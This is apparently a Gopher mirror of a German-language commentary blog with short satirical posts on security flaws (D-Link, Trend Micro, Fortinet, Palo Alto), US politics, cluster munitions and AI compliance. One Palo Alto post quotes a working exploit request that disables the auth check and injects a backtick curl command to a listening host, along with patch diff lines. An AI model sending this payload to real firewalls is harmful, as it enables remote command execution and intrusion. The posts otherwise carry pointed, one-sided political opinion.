___ __ ___ _
| __|___ / _| ___ ___ | _ )| | ___ __ _
| _|/ -_)| _|/ -_)(_-< | _ \| |/ _ \/ _` |
|_| \___||_| \___|/__/ |___/|_|\___/\__, |
On Gopher (inofficial) |___/
-----------------------------------------------------------------------
URI Visit Fefes Blog on the Internet
-----------------------------------------------------------------------
Falls hier jemand D-Link-Geräte einsetzt: HAHA SUCKER[1]. Sagt D-Link.
Ich paraphrasiere nur.
Links:
URI [1]: https://www.theregister.com/2024/11/20/dlink_rip_replace_route ...
***********************************************************************
Im Moment kursieren (natürlich!) Anschuldigungen des Wahlbetrugs in
den USA.
Hier ist der seriösere der offenen Briefe[1].
Der Zug ist abgefahren. Biden und Harris hatten JAHRE Zeit, das
Wahlsystem zu reformieren. Haben sie nicht gemacht. Weil sie dachten,
vielleicht, dass ihnen das Herrschaftswissen selber mal nutzen würde.
Geliefert wie bestellt. Ich habe kein Mitleid und keinen Drang da
irgendwas aufgeklärt zu kriegen. Das war ihre Chance und sie haben es
verkackt.
So und nur so funktioniert Evolution. Wenn man sich aus verkacktem
Verhalten wieder rausschleimen kann, funktioniert das nicht. Das muss
tödlich sein und die nächste Generation hat dann hoffentlich was
gelernt. Oder sie ereilt, genauso verdient, dasselbe Schicksal.
Ich positioniere mich immer gerne so, dass ich danach Told You So sagen
kann. Well... Told You So. Nein, ich werde euch jetzt nicht helfen, die
Auswirkungen eures nicht auf mich hörens zu verringern.
Links:
URI [1]: https://freespeechforpeople.org/wp-content/uploads/2024/11/let ...
***********************************************************************
Aus der beliebten Politikschule "jetzt ist auch egal", heute: Biden
will der Ukraine noch schnell Anti-Personen-Minen liefern[1].
Na? Krieg ich jetzt auch wieder Leserbriefe, dass die gar nicht
wirklich geächtet sind?
Links:
URI [1]: https://orf.at/stories/3376492/
***********************************************************************
Die CIA hat herausgefunden[1], dass ein Atomkrieg schlecht für die
Wirtschaft wäre.
Links:
URI [1]: https://www.dni.gov/files/ODNI/documents/assessments/NICM-Decl ...
***********************************************************************
Wieso hat Selenskyj eigentlich keinen Trump-Golfplatz in Kharkiv
gebaut?
Wir haben die besten Golfplätze! Mit den meisten Kratern, äh,
Löchern!
***********************************************************************
Genau mein Humor: Trend Micros Deep Security Agent ermöglicht
Einschleusen von Schadcode[1].
Und alle so: NEIN!!!! DOCH!!! OOOOOH!!
Immerhin ist die Benamung richtig. Es handelt sich um einen Agenten.
Nur halt nicht für unsere Seite.
Trend Micro bewirbt sich auch direkt auf einen Lame Excuse Award:
--- QUOTE ---
Um die Lücke zu missbrauchen, benötigten Angreifer physischen oder
Fernzugriff auf eine verwundbare Maschine, schränkt Trend Micro ein.
---- END ----
Was genau schränkt das ein? LMAO
Links:
URI [1]: https://www.heise.de/news/Trend-Micros-Deep-Security-Agent-erm ...
***********************************************************************
Diese Meldung[1] funktioniert auf mehreren Ebenen.
Die Deutsche Bank steigt bei "KI"-Startup Aleph Alpha ein, kauft
Anteile von Frühinvestoren (d.h. kauft die VCs raus, die offenbar
kapiert haben, dass dieser "KI"-Scheiß Bullshit ist und raus wollten).
Das finde ich schonmal eine gute Nachricht, wenn die VCs um ihr Leben
fürchten.
Aber was will die Deutsche Bank mit "KI"? Nun, ...
--- QUOTE ---
Das Institut nimmt auch an einem Projekt von Creance.ai teil – einer
Kooperation von PwC Deutschland und Aleph Alpha, bei der untersucht
wird, wie generative KI helfen kann, Compliance-Anforderungen
effizienter zu bewältigen. Verträge mit Dienstleistern sollen im
Einklang mit der EU-Verordnung DORA validiert werden.
---- END ----
Da unseren Regulierern und Politikern in Sachen "was könnten wir mal
besser machen" nichts einfällt außer "Hmm man könnte mehr Papierkram
von den Firmen fordern", versinken die Firmen gerade alle in sinnlosem
Papierkrieg und produzieren alle Palettenweise sinnlosen Text, den nie
jemand lesen wird.
Denn wer sollte das lesen? Die Regulierungsbehörden? Soviele Bürger
gibt es in diesem Land nicht, die die alle einstellen müssten. Die
Regulierer wissen das, die Firmen wissen das, und damit ist der Weg
frei für: "KI" schreibt die sinnlosen Texte, die eh nie jemand lesen
wird.
Eine Erfolgsgeschichte! Ach was sage ich: Ein Exportschlager!!
Denn Deutschland drückt diese Marktverzerrung (kleine Konkurrenten
können sich den Scheiß nicht leisten, so garantiert die Politik das
Überleben der Deutschen Bank und anderer Ineffizienzmaschinen)
natürlich EU-weit durch. Die werden auch alle "KI" kaufen müssen.
Warum also nicht bei uns?!
Wenn es nicht so traurig wäre, könnte man die alle prima auslachen.
Update: Ist ja gut. Ihr könnt mir zu schreiben aufhören, dass man
halt eine "KI" anschaffen muss, um den "KI"-Compliance-Output zu lesen.
Der Witz war implizit, denn eine "KI" ist ja keine Person. Das liest
nach wie vor niemand.
Links:
URI [1]: https://www.spiegel.de/wirtschaft/unternehmen/ki-deutsche-bank ...
***********************************************************************
OLG Schleswig-Holstein[1]: Keine Social-Media-Sperre ohne vorherige
Nutzeranhörung.
Die Entscheidung wird wahrscheinlich klarer, wenn man guckt, um was
für einen Beitrag es hier ging:
--- QUOTE ---
Der Blockierte hatte das Ergebnis einer Kreistagswahl 2021 so
kommentiert: "Die Deutschen sind sowas von krank. Deutschland hat
fertig."
---- END ----
Lol wat? Dafür sperrt Facebook Accounts und löscht unilateral
Beiträge?!
Links:
URI [1]: https://www.heise.de/news/OLG-Schleswig-Holstein-Keine-Social- ...
***********************************************************************
All diese Palo Alto Exploits, das kann Fortinet nicht auf sich sitzen
lassen[1]!
--- QUOTE ---
Chinese hackers exploit Fortinet VPN zero-day to steal credentials
---- END ----
Und natürlich ist Fortinet genau so drauf wie der Rest der Industrie,
wenn es um Bug-Fix-Geschwindigkeit geht.
--- QUOTE ---
"Volexity reported this vulnerability to Fortinet on July 18, 2024, and
Fortinet acknowledged the issue on July 24, 2024," explains the report.
"At the time of writing, this issue remains unresolved and Volexity is
not aware of an assigned CVE number."
---- END ----
Aber Fortinet ist nicht Microsoft, also kolportiert die Presse nicht
das übliche unerträgliche Gewinsel von Microsoft, dass hier
unschuldige Kunden gefährdet würden und man doch Responsible
Disclosure fordert. Da krieg ich jedesmal Zucken in der Faust, wenn ich
das lese. Die Kunden werden ja nicht von der Disclosure gefährdet
sondern von der beschissenen Produktqualität ihrer versifften
Zulieferer.
Links:
URI [1]: https://www.bleepingcomputer.com/news/security/chinese-hackers ...
***********************************************************************
Hier kamen mehrere Leserbriefe rein, dass Streumunition ja nicht
wirklich geächtet sei. Nur Länder, die nicht annahmen, dass sie
demnächst Krieg führen werden, hätten sie geächtet. Und überhaupt,
wieviel kann eine Ächtung schon wert sein, wenn China und Indien nicht
dabei sind, die zusammen die Hälfte der Menschheit sind.
Nun, nehmt nicht mein Wort, dass das geächtet ist. Nehmt das der ARD,
wenn es um Russland ging[1].
--- QUOTE ---
Diese Waffen sind durch internationale Verträge geächtet.
---- END ----
Ach. Ach was. Aber wenn die Ukraine das einsetzt, ist es nicht
geächtet, nehme ich an? Tolle Wurst.
Links:
URI [1]: https://www.tagesschau.de/ausland/europa/streubomben-ukraine-1 ...
***********************************************************************
Erinnert ihr euch an Südwestfalen-IT? Diesen kommunalen Dienstleister
für die ganzen Kommunen in der Gegend? Der dann einen "Cybervorfall"
hatte und dann monatelang nicht in der Lage war, wieder voll verfügbar
zu sein?
Da gibt es jetzt Folgen[1].
--- QUOTE ---
Einem ehemaligen Geschäftsführer, der noch Gehalt kassierte, wurde
gekündigt. Gegen weitere Mitarbeiter wurden Disziplinarmaßnahmen
eingeleitet.
---- END ----
Und, fast noch schockierender:
--- QUOTE ---
Die bisherige Organisationsform mit einer "aufgeblähten" 119-köpfigen
Verbandsversammlung und einem von Politikern dominierten Vorstand werde
reformiert, heißt es. Künftig sollen mehr IT-Experten dem Gremium
angehören.
---- END ----
ACH. ACH WAS. Es ist jemandem aufgefallen, dass Politiker gar nichts
können und man ihnen keine Verantwortung übergeben darf, schon gar
nicht in Gesellschaften, die einen tatsächlichen Zweck erfüllen
sollen und nicht nur Geld verbrennen dürfen wie Lotto und SPD-eigene
Verlage? Das ist ja unglaublich!
Gibt es etwa doch noch Hoffnung?
Update: Wenn man genauer hinguckt, ist die Antwort natürlich: Nein,
gibt es nicht. Denn keiner von denen musste in den Knast, keiner musste
irgendwas zurückzahlen, im Gegenteil hat der eine Typ noch jahrelang
Gehalt gekriegt, ohne dafür auch nur zur Arbeit erschienen zu sein.
Wie das halt so ist, wenn "kommunale Dienstleister" mit abgehalfterten
Politikern bestuhlt werden.
Links:
URI [1]: https://www.heise.de/news/Nach-Cyberattacke-Neuordnung-der-Fue ...
***********************************************************************
Wo wir gerade bei der Kategorie "genau mein Humor" waren: Ottawa paid
nearly $670,000 for KPMG’s advice on cutting consultant costs[1].
*Wieher*
Links:
URI [1]: https://www.theglobeandmail.com/politics/article-federal-gover ...
***********************************************************************
Braucht ihr mal einen richtigen Bauchlacher? Die Meldung hier
liefert[1].
--- QUOTE ---
immerhin sei Windows 11 bereits "das sicherste Betriebssystem der
Welt", wie die Ankündigung betont.
---- END ----
BWAHAHAHA genau mein Humor!
--- QUOTE ---
Und schließlich will Microsoft den Identitätsschutz verbessern, um
Phishing-Angriffe zu verhindern.
---- END ----
Der einzige, der alle eure Daten sehen können soll, soll Microsoft
sein. Und ihr bezahlt noch dafür. Wie diese Mauer um Mexiko herum,
falls ihr euch erinnert.
Links:
URI [1]: https://www.heise.de/news/Windows-11-Security-Updates-fuer-das ...
***********************************************************************
Das US-Justizministerium denkt laut darüber nach[1], Google zum
Chrome-Verkaufen zu zwingen. Wegen Monopolmissbrauchs.
Ich glaube nicht, dass das ernst gemeint ist. Ich glaube, das Kalkül
lief etwa so: Biden ist eine lahme Ente, wir sind frisch abgewählt,
und Trump hasst unsere Kumpels, die Tech Bros.
Trump findet ja, dass die Social Networks und Suchmaschinen ihn unfair
benachteiligt haben, indem sie seine Misinformationen zu bekämpfen und
rauszufiltern versucht haben, und hat daher als neuen FCC-Chef (deren
Kommunikations-Regulierer) diesen Spezialexperten[2] ausgesucht, der
von einem "Zensurkartell" spricht, das man jetzt zerschlagen müsse.
Das ungerechte Zorn der Republikaner richtet sich vor allem gegen
Facebook, aber auch gegen Google, wegen Suche und Youtube, wo Google
bei Covid-Lügnern Hinweise eingeblendet hat, so man sich inhaltlich
belastbarer informieren kann.
Aus Sicht der untoten Democrats im abgewählten Justizministerium ist
also absehbar, dass Trump die Tech-Riesen zerschlagen wird. Die
Democrats wissen auch, dass Kartelle Scheiße sind, und wenn die Tech
Bros nicht alle in Democrat-Hochburgen säßen und dort Arbeitsplätze
schüfen, hätte man vielleicht auch schonmal etwas zu unternehmen
versucht. Aber hey, wenn die eh demnächst geschlachtet werden, dann
kann man wenigstens jetzt so tun, als sei man selbst der Auslöser
gewesen, der hier Gerechtigkeit schafft. Denn das Narrativ ist den
Democrats ja bereits ziemlich komplett entglitten an der Stelle. Google
Search ist so schlecht geworden, dass Googles "das schadet dem Kunden"
vor allem Gelächter auslöst.
Links:
URI [1]: https://www.msn.com/en-us/news/technology/google-s-chrome-to-f ...
URI [2]: https://x.com/BrendanCarrFCC/status/1857419658812440927
***********************************************************************
Fallout: Japan eröffnet stark[1] mit einer Jury-Rig-Gauss-Handgun
(vergleiche: die Bastelkanone aus der Abe-Ermordung[2]).
Links:
URI [1]: https://www3.nhk.or.jp/news/html/20241119/k10014642881000.html
URI [2]: https://apnews.com/article/shinzo-abe-japan-crime-tokyo-gun-po ...
***********************************************************************
Läuft offenbar gut, der Fünffrontenkrieg Israels gerade. So gut, dass
Artikel wie dieser in der Jerusalem Post veröffentlicht werden[1]:
--- QUOTE ---
Southern Lebanon is actually northern Israel - opinion
---- END ----
Na dann können wir das ja bedenkenlos annektieren!
Links:
URI [1]: https://www.jpost.com/opinion/article-829140
***********************************************************************
Die ARD schreibt[1]:
--- QUOTE ---
ATACMS können mit Streumunition[2] bestückt werden, die sich am
Zielort in einem weiten Radius verteilt. International ist
Streumunition[2] höchst umstritten, weil sie wegen ihres Streufaktors
auch Jahre nach einem militärischen Konflikt zu zivilen Opfern führen
kann. Im Ukraine-Krieg wurde sie auch deshalb ausgeliefert, um den
großen Vorsprung Russlands bei der Munitionsproduktion auszugleichen.
Zudem kann Streumunition[2] besonders effektiv gegen Truppen und
ungepanzerte Fahrzeuge im offenen Gelände eingesetzt werden.
---- END ----
Schade, dass die ARD sich kein Fact Checking leisten kann. Sonst hätte
ihnen jemand mitgeteilt, dass Streumunition[2] nicht "umstritten"
sondern geächtet ist. Das ist ethisch so sonnenklar, dass sogar der
Heilige Stuhl das ratifiziert hat[3]. Selbst der Südsudan ist
beigetreten. Aber die USA, Russland und die Ukraine haben nicht
unterschrieben, genausowenig wie China und Israel, Indien und Pakistan.
Selbst in der EU gibt es ein paar Gruselstaaten, die sich in
Ethikfragen noch hinter dem Südsudan eingereiht haben: Finnland,
Estland, Lettland, Polen, Rumänien und Griechenland. Eine Schande.
Deutschland hat das unterschrieben und ratifiziert. Insofern bin ich
irritiert, dass die ARD das jetzt als eine offene Streitfrage
darstellt, ob man das einsetzen sollte oder nicht.
Links:
URI [1]: https://www.tagesschau.de/ausland/amerika/atacms-eigenschaften ...
URI [2]: https://de.wikipedia.org/wiki/Streumunition
URI [3]: https://de.wikipedia.org/wiki/%C3%9Cbereinkommen_%C3%BCber_Str ...
***********************************************************************
Hey, liebes BSI? Kurze Frage für einen Freund.
Wieviele KRITIS-Organisationen setzen eigentlich Fortinet oder Palo
Alto ein? Und sind damit durch diverse Audits und Pentests gekommen?
Wir haben doch umfangreiche Dokumentationspflichten jetzt. Erzählt
doch mal, wie gut die geholfen haben!
Wie viele Firmen haben ISO-27001 und Fortinet/Palo Alto?
Fällt euch selber was auf oder muss ich weiterreden?
Update: Leserbrief:
--- QUOTE ---
Ich arbeite in einem Kritis-Unternehmen (Strom). Habe heute im Flurfunk
mitbekommen, dass wir in unserem neuen Rechenzentrum nicht mehr auf
Fortinet setzen.
Wir werden da etwas einsetzen von:
Palo Alto
---- END ----
Badumm Tsssss
Ich persönlich wundere mich ja nicht, dass wir ständig gehackt
werden. Ich wundere mich, dass wir nur so wenig gehackt werden. Das
liegt wahrscheinlich daran, dass unsere Spezialexperten wegen des
ganzen Checklistenballetts nicht bemerken, dass und wie lange und von
wie vielen parallel sie schon kompromittiert wurden.
***********************************************************************
Ich habe vor einer Weile angefangen, Compliance-Bullshit als
Kunstförderung zu bezeichnen, weil es halt reines Theater ist und
nichts bringt.
Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken
einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß
ist, über den wir schon in den 1980er Jahren gelacht haben.
Aktuelles Beispiel: Palo Alto[1]. Ja, die schon wieder. SCHON WIEDER.
Ich hab auch keinen Bock mehr.X-PAN-AUTHCHECK: offIch wünschte, ich
würde Witze machen.POST
/php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl
{{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1Und was
fiel da raus? Richtig! Eine gültige Session-ID!
Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto
jetzt wochenlang saß, während ihre Kunden fröhliche exploitet
wurden.+ $user = $_POST['user'];
+ if (strlen($user) <= 63
- $_POST['user'],
+ $user,Die neue Eingabevalidierung ist ... eine
Längenbegrenzung. Nein, wirklich!
Ich wünschte, ich würde Witze machen.- return
$p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o
$username");
+ $u = $s->escapeshellarg($username);
+ return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg
-o $u");Wisst ihr was? You had me at PHP. (via[2])
Links:
URI [1]: https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-al ...
URI [2]: https://www.heise.de/-10051696
***********************************************************************
Wo wir gerade bei FDP und Verrat waren: "NIUS" (Achtung: Link geht zu
"NIUS") ist entsetzt[1], dass eine FDP-Politikerin an Abmahnungen wegen
Hate Speech im Internet mitverdient.
Was?! Die FDP besteht aus windigen Geschäftemachern, deren Prinzipien
nur vorgeschoben sind?! Das ist ja unglaublich, Bob! Hättet ihr mal
die CDU gefragt[2], die wissen das schon länger!
Dass diese FDP-betriebene Abmahnfirma auch noch neben CDU-Hasszerrbild
Habeck auch noch Julia Klöckner (CDU!!!) zu ihren Kunden zählt,
rundet das Schreckenslagebild ab.
Update: Falls ihr "NIUS" nicht kennt: Das ist das neue Projekt von
Ex-"Bild"-"Redakteur" Julian Reichelt, der ja auch wegen Verrats an
Döpfner[3] Ärger hatte. Da schließt sich der Kreis. Auch du, Brutus?
Links:
URI [1]: https://www.nius.de/politik/news/fdp-politikerin-verdient-am-k ...
URI [2]: https://blog.fefe.de/?ts=99c2b715
URI [3]: https://blog.fefe.de/?ts=9ab860f0
***********************************************************************
DIR <- go back